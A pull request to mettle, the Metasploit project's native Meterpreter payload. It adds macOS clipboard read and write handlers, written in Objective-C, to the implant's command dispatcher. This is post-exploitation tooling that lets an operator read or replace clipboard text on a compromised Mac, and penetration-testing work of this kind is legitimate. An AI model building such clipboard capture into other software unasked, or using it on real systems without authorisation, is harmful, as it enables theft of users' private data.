### PR TITLE
osx clipboard

### DIFF
--- a/mettle/configure.ac
+++ b/mettle/configure.ac
@@ -27,6 +27,7 @@ case $host_os in
 			 #endif],
 			[HOST_OS=osx
 			 AC_DEFINE(HAVE_DESKTOP_SCREENSHOT)
+			 AC_DEFINE(HAVE_CLIPBOARD)
 			 AC_SUBST([PLATFORM_LDADD], ["$PLATFORM_LDADD -framework Cocoa"])],
 			[HOST_OS=ios])
 		;;

--- a/mettle/src/Makefile.am
+++ b/mettle/src/Makefile.am
@@ -42,6 +42,7 @@ libmettle_la_SOURCES += stdapi/webcam/apple_webcam.m
 endif
 if HOST_OSX
 libmettle_la_SOURCES += stdapi/ui/osx_desktop.m
+libmettle_la_SOURCES += stdapi/clipboard/osx_clipboard.m
 endif
 if HOST_LINUX
 libmettle_la_SOURCES += stdapi/webcam/linux_webcam.c

--- a/mettle/src/stdapi/clipboard/clipboard.c
+++ b/mettle/src/stdapi/clipboard/clipboard.c
@@ -1,0 +1,29 @@
+/**
+ * Copyright 2015 Rapid7
+ * @brief Clipboard API
+ * @file clipboard.c
+ */
+
+#include <endian.h>
+#include <errno.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+#include <mettle.h>
+
+#include "channel.h"
+#include "log.h"
+#include "tlv.h"
+#include "clipboard.h"
+
+void clipboard_register_handlers(struct mettle *m)
+{
+	struct tlv_dispatcher *td = mettle_get_tlv_dispatcher(m);
+
+#if HAVE_CLIPBOARD
+	tlv_dispatcher_add_handler(td, "extapi_clipboard_get_data", extapi_clipboard_get_data, m);
+	tlv_dispatcher_add_handler(td, "extapi_clipboard_set_data", extapi_clipboard_set_data, m);
+#endif
+}
+

--- a/mettle/src/stdapi/clipboard/clipboard.h
+++ b/mettle/src/stdapi/clipboard/clipboard.h
@@ -1,0 +1,10 @@
+#ifndef _STDAPI_CLIPBOARD_H_
+#define _STDAPI_CLIPBOARD_H_
+
+#define TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT            (TLV_META_TYPE_GROUP    | (TLV_EXTENSIONS + 39))
+#define TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT    (TLV_META_TYPE_STRING   | (TLV_EXTENSIONS + 40))
+
+struct tlv_packet *extapi_clipboard_get_data(struct tlv_handler_ctx *ctx);
+struct tlv_packet *extapi_clipboard_set_data(struct tlv_handler_ctx *ctx);
+
+#endif

--- a/mettle/src/stdapi/clipboard/osx_clipboard.m
+++ b/mettle/src/stdapi/clipboard/osx_clipboard.m
@@ -1,0 +1,33 @@
+#import <AVFoundation/AVFoundation.h>
+
+#import <AppKit/NSPasteboard.h>
+
+#include "tlv.h"
+#include "clipboard.h"
+
+struct tlv_packet *extapi_clipboard_set_data(struct tlv_handler_ctx *ctx)
+{
+  const char* clipboard_text = tlv_packet_get_str(ctx->req, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT);
+  @autoreleasepool {
+    NSString *text = [NSString stringWithUTF8String:clipboard_text];
+    NSPasteboard *pasteboard = [NSPasteboard generalPasteboard];
+    [pasteboard clearContents];
+    [pasteboard setString:text forType:@"public.utf8-plain-text"];
+  }
+  return tlv_packet_response_result(ctx, TLV_RESULT_SUCCESS);
+}
+
+struct tlv_packet *extapi_clipboard_get_data(struct tlv_handler_ctx *ctx)
+{
+  struct tlv_packet *p = tlv_packet_response_result(ctx, TLV_RESULT_SUCCESS);
+  @autoreleasepool {
+    NSPasteboard *pasteboard = [NSPasteboard generalPasteboard];
+    NSString* text = [pasteboard stringForType:NSPasteboardTypeString];
+    const char *clipboard_text = (const char *)[text cStringUsingEncoding:NSUTF8StringEncoding];
+
+    struct tlv_packet *group = tlv_packet_new(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, 0);
+    group = tlv_packet_add_str(group, TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT_CONTENT, clipboard_text);
+    p = tlv_packet_add_child(p, group);
+  }
+  return p;
+}

--- a/mettle/src/stdapi/stdapi.c
+++ b/mettle/src/stdapi/stdapi.c
@@ -14,6 +14,7 @@
 #include "sys/process.c"
 #include "webcam/webcam.c"
 #include "ui/ui.c"
+#include "clipboard/clipboard.c"
 
 void tlv_register_stdapi(struct mettle *m)
 {
@@ -31,4 +32,5 @@ void tlv_register_stdapi(struct mettle *m)
 
 	webcam_register_handlers(m);
 	ui_register_handlers(m);
+	clipboard_register_handlers(m);
 }


### PR DESCRIPTION
This implements extapi_clipboard_get_data and extapi_clipboard_set_data for OSX.
There isn't currently a native OSX api to monitor for clipboard changes, so for clipboard_monitor_start we'd have to do some kind of polling. I thought I'd keep it simple for now and we can always add that later.
Note you have to do `load extapi` for the commands to show up, this is the same on Android. I suspect this needs to be fixed on the framework side.